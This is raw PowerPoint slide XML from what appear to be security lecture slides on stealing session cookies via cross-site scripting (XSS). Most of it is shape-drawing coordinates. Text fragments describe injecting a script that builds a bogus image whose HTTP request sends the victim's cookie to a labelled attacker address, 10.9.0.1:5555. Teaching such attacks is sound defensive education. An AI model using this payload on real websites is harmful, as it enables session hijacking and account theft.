            <a:r>
              <a:rPr sz="1600" b="1" spc="4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+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'&gt;');&lt;/script&gt;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We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create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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>“trap”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bogus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image.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when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someone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else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tries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load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</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> issues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lang="en-US" sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>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lang="en-US" sz="1600" spc="5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>HTTP </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1600" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>request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10.9.0.1:5555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 dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="35052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What </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t>does</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Arial MT"/>
                <a:cs typeface="Arial MT"/>
              </a:rPr>
              <a:t> it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request?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current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user’s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session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cookie!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9D920-659D-6864-FC5D-0EE3B93F259B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8051884" y="5224384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10.9.0.1 = The attacker’s IP address!! </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1202943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7FC9AE4-F899-9695-E387-779954E4B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836" y="46482"/>
            <a:ext cx="65317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Stealing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Cookie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Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> via XSS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3" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB9329FB-0E63-55F0-F25F-A4C86CF077E0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8447531" y="44196"/>
            <a:ext cx="3714115" cy="2496820"/>
            <a:chOff x="8447531" y="44196"/>
            <a:chExt cx="3714115" cy="2496820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="object 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28F0581A-759D-8B17-5A05-0C615EEF80B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7531" y="44196"/>
              <a:ext cx="3713987" cy="2496312"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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28CA5065-E3D3-AE07-0B03-75C093173089}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="163792" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81952" y="12777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24959" y="47048"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1266" y="133346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="626573" y="449245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="683595" y="414976"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="707257" y="328666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1637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B929DD2D-6042-B228-3D5D-8C601E765155}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10438293" y="1162494"/>
              <a:ext cx="708660" cy="462280"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="708659" h="462280">
                  <a:moveTo>
                    <a:pt x="7963" y="72199"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="49913" y="27235"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="120203" y="3692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163792" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="211847" y="1717"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="263494" y="8863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="317860" y="21456"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="374071" y="39514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431254" y="63055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="486419" y="91026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="536785" y="121838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="581801" y="154816"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620913" y="189289"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="653568" y="224583"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="679212" y="260026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="697293" y="294944"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="708551" y="360517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700621" y="389826"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658622" y="434789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="588319" y="458325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="544729" y="462010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="496674" y="460281"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="445023" y="453118"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="390648" y="440504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334418" y="422419"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277203" y="398843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222039" y="370875"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171673" y="340073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126660" y="307109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="87553" y="272654"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54906" y="237378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29273" y="201954"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11208" y="167053"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="101504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7963" y="7219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5D5EB16C-C6CA-4AFC-21B0-65AD58155664}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10609198" y="1264284"/>
              <a:ext cx="349250" cy="254000"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="232155" y="199389"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="230124" y="199389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="229489" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227965" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227202" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224790" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223900" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222376" y="212089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="214629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220852" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221233" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="224789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="226060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225678" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="231139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232664" y="236220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="235584" y="238760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242697" y="243839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="246760" y="245110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="251332" y="247650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264668" y="252729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="271399" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="284479" y="254000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="273430" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267589" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236093" y="203200"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="234823" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233806" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232791" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="232155" y="199389"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="298576" y="109220"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="292734" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287400" y="110489"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281940" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276986" y="114300"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267970" y="121920"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264286" y="127000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261366" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="258952" y="138429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257555" y="144779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257428" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257175" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="257809" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260350" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="262127" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="264541" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="266826" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="269494" y="180339"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="272287" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="274954" y="186689"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="277749" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="282955" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="285242" y="198120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287147" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288925" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290195" y="207010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290829" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291465" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291083" y="215900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="220979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="287020" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283209" y="227329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281050" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="278637" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276098" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318389" y="229870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319024" y="228600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321436" y="223520"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322706" y="218439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322960" y="213360"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="323087" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="322452" y="204470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321182" y="200660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="319785" y="195579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318007" y="191770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="315595" y="189229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="310515" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="307721" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="304926" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="302259" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="299466" y="168910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294512" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="292607" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290575" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289432" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288798" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288162" y="148589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="288544" y="146050"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289814" y="143510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="290702" y="140970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291973" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295021" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="296799" y="135889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298830" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="347218" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="343916" y="130810"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342010" y="128270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="337311" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="334645" y="123189"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="331850" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="328929" y="119379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="325881" y="116839"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316737" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="298576" y="109220"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="135381" y="154939"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="131064" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="130301" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129667" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="128904" y="157479"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127380" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="126492" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125475" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124078" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123190" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122427" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123444" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124332" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="125856" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="127253" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="129285" y="185420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="131825" y="187960"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="152907" y="201929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159639" y="205739"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166370" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="173100" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="179704" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186054" y="209550"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192024" y="208279"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="175132" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="169291" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166116" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="162941" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157987" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153924" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150622" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="147447" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="144779" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140589" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138937" y="160020"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137668" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="136525" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="135381" y="154939"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="200151" y="64770"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="194436" y="64770"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="183642" y="67310"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159130" y="99060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159003" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="159384" y="113029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171069" y="134620"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176656" y="142239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="181991" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184657" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="186944" y="153670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="156210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190626" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192531" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193167" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192785" y="171450"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191389" y="173989"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190246" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="188722" y="179070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="184911" y="181610"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182625" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177800" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220196" y="184150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220725" y="182879"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="223139" y="177800"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224626" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224535" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224154" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222757" y="154939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="221487" y="151129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="219582" y="147320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="214756" y="139700"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212090" y="137160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209423" y="133350"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="201168" y="124460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="120650"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196087" y="118110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192277" y="111760"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191007" y="109220"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="189737" y="104139"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="190119" y="100329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191516" y="97789"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="192404" y="95250"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="193548" y="93979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="196596" y="91439"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198374" y="90170"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="202437" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248094" y="88900"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245618" y="85089"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243585" y="83820"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="239014" y="80010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="236347" y="77470"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="230504" y="73660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="227583" y="72389"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="224408" y="71120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="212344" y="66039"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="200151" y="64770"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="349250" h="254000">
                  <a:moveTo>
                    <a:pt x="103754" y="102870"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="75183" y="102870"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77977" y="158750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78104" y="162560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78358" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78612" y="163829"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79248" y="165100"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81025" y="166370"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82296" y="167639"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="85851" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88392" y="170179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="91567" y="172720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98298" y="175260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="100583" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="106806" y="176529"/>
                  </a:lnTo>
                  <a:lnTo>
